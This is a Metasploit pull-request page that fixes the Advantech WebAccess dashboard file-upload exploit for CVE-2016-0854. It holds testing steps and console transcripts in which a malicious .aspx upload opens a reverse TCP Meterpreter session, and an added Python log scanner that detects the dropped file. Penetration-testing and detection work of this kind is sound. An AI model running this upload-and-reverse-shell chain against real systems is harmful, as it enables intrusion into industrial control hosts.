Fix #6872, change upload action for CVE-2016-0854 exploit #6874

Merged
merged 1 commit into from May 14, 2016

Conversation

wchen-r7
Contributor

@wchen-r7 wchen-r7 commented May 14, 2016

What This Patch Does

This patch includes the following changes for exploit/windows/scada/advantech_webaccess_dashboard_file_upload:

  • Instead of the uploadFile action, this patch uses uploadImageCommon to be able to support both Advantech WebAccess builds: 2014 and 2015.
  • It uses an explicit check instead of the passive version check.
  • It cleans up the malicious file after getting a session.
  • Added module documentation to explain the differences between different builds of Advantech WebAccess 8.0s, and 8.1.

Fix #6872

Verification

Testing for WebAccess 8.0_20141103

  • Start a Windows 7 SP1 box
  • Make sure IIS is installed
  • Download WebAccess 8.0_20141103.
  • Install WebAccess 8.0
  • Make sure WebAccess is up and running by checking it with a browser (on port 80)
  • Start msfconsole
  • Do: use exploit/windows/scada/advantech_webaccess_dashboard_file_upload
  • Do: info -d
  • msfconsole should spawn the module documentation (knowledge base) with a browser
  • Back to msfconsole, do: set RHOST [TARGET_IP]
  • Do: check
  • msfconsole should say that the target is vulnerable.
  • Do: exploit
  • You should get a session

Testing for WebAccess 8.0_20150816

  • Start a Windows 7 SP1 box
  • Make sure IIS is installed
  • Download WebAccess 8.0_20150816
  • Install WebAccess 8.0
  • Make sure WebAccess is up and running by checking it with a browser (on port 80)
  • Start msfconsole
  • Do: use exploit/windows/scada/advantech_webaccess_dashboard_file_upload
  • Back to msfconsole, do: set RHOST [TARGET_IP]
  • Do: check
  • msfconsole should say that the target is vulnerable.
  • Do: exploit
  • You should get a session

Demo

Both WebAccess 8.0 20150816 and 8.0 20141103 should give you a session like this:

msf exploit(advantech_webaccess_dashboard_file_upload) > check
[+] The target is vulnerable.
msf exploit(advantech_webaccess_dashboard_file_upload) > run

[*] Started reverse TCP handler on 192.168.1.209:4444 
[*] 192.168.1.201:80 - 192.168.1.201:80 - Uploading malicious file...
[*] 192.168.1.201:80 - Uploading: MYuXQ.aspx
[*] 192.168.1.201:80 - 192.168.1.201:80 - Executing MYuXQ.aspx...
[*] Sending stage (957999 bytes) to 192.168.1.201
[*] Meterpreter session 1 opened (192.168.1.209:4444 -> 192.168.1.201:49319) at 2016-05-13 18:42:46 -0500
[+] Deleted ../../../Inetpub/wwwroot/broadweb/WADashboard/MYuXQ.aspx

meterpreter >

This patch includes the following changes:

* Instead of the uploadFile action, this patch uses uploadImageCommon
  to be able to support both Advantech WebAccess builds: 2014 and
  2015.
* It uses an explicit check instead of the passive version check.
* It cleans up the malicious file after getting a session.
* Added module documentation to explain the differences between
  different builds of Advantech WebAccess 8.0s, and 8.1.

Fix rapid7#6872
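As an added defender-side illustration (not code from this pull request or from the Metasploit module), the session transcript above shows the module dropping a randomly named .aspx file under the WADashboard directory, requesting it, and then deleting it after the session is up. Because the cleanup removes the file itself, the web server log is the evidence that remains; the Python below scans constructed IIS W3C log lines for a .aspx page requested directly under /broadweb/WADashboard/ that is not on an allow-list. The allow-list contents and the sample log lines are assumptions.

```python
# Directory the module writes into, taken from the "Deleted ../../../Inetpub/wwwroot/
# broadweb/WADashboard/..." line in the transcript, expressed as a URL path under the
# IIS web root. The upload endpoint is not shown on the page, so this keys on the
# execution step: a request for an .aspx page directly inside that directory.
WATCHED_DIR = "/broadweb/wadashboard/"

# Hypothetical allow-list of legitimate .aspx pages in that directory (assumption; an
# operator would populate it from a clean install of the same build).
KNOWN_PAGES = {"/broadweb/wadashboard/index.aspx"}

# IIS W3C extended log field order assumed for the constructed sample below.
W3C_FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query", "s_port",
              "username", "c_ip", "user_agent", "status"]


def parse_w3c_line(line):
    """Parse one W3C extended log line into a dict; None for comment or blank lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(W3C_FIELDS):
        return None
    return dict(zip(W3C_FIELDS, parts))


def is_suspicious_aspx(entry):
    """True for a non-allow-listed .aspx page requested directly under WATCHED_DIR."""
    stem = entry["uri_stem"].lower()
    if not stem.startswith(WATCHED_DIR) or not stem.endswith(".aspx"):
        return False
    if "/" in stem[len(WATCHED_DIR):]:  # ignore deeper subdirectories
        return False
    return stem not in KNOWN_PAGES


def find_dropped_aspx(log_text):
    """Return [(client_ip, uri_stem, status)] for requests matching the pattern."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_w3c_line(line)
        if entry and is_suspicious_aspx(entry):
            hits.append((entry["c_ip"], entry["uri_stem"], entry["status"]))
    return hits


# Constructed sample log (not from the page): one legitimate page, one dropped file,
# one unrelated .asp request. File name and addresses mirror the transcript above.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2016-05-13 23:42:40 192.168.1.201 GET /broadweb/WADashboard/index.aspx - 80 - 192.168.1.50 Mozilla/5.0 200
2016-05-13 23:42:45 192.168.1.201 GET /broadweb/WADashboard/MYuXQ.aspx - 80 - 192.168.1.209 Mozilla/5.0 200
2016-05-13 23:42:46 192.168.1.201 GET /broadweb/index.asp - 80 - 192.168.1.50 Mozilla/5.0 200
"""
```

Run `find_dropped_aspx(SAMPLE_LOG)` to see the single hit for MYuXQ.aspx; in practice the allow-list should be built from the installed build, since 8.0 and 8.1 ship different page sets.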
@nixawk
Contributor

nixawk commented May 14, 2016

@wchen Thanks.

msf exploit(advantech_webaccess_dashboard_file_upload) > show options

Module options (exploit/windows/scada/advantech_webaccess_dashboard_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.1.103    yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path of Advantech WebAccess 8.0
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Advantech WebAccess 8.0


msf exploit(advantech_webaccess_dashboard_file_upload) > run

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] 192.168.1.103:80 - 192.168.1.103:80 - Uploading malicious file...
[*] 192.168.1.103:80 - Uploading: iWOWo.aspx
[*] 192.168.1.103:80 - 192.168.1.103:80 - Executing iWOWo.aspx...
[*] Sending stage (957999 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:1361) at 2016-05-14 10:26:17 -0500
[+] Deleted ../../../Inetpub/wwwroot/broadweb/WADashboard/iWOWo.aspx

meterpreter > sysinfo
Computer        : GOOGLE
OS              : Windows 7 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32

@bcook-r7 bcook-r7 self-assigned this May 14, 2016
@bcook-r7
Contributor

bcook-r7 commented May 14, 2016

Good enough for me, thanks @wchen-r7

@bcook-r7 bcook-r7 merged commit 3b5db26 into rapid7:master May 14, 2016
bcook-r7 pushed a commit that referenced this pull request May 14, 2016
@bcook-r7
Contributor

I made a couple of small changes that remove ternary no-ops: 0d176f2

@wchen-r7 wchen-r7 deleted the fix_6872 branch August 22, 2016 16:29
3 participants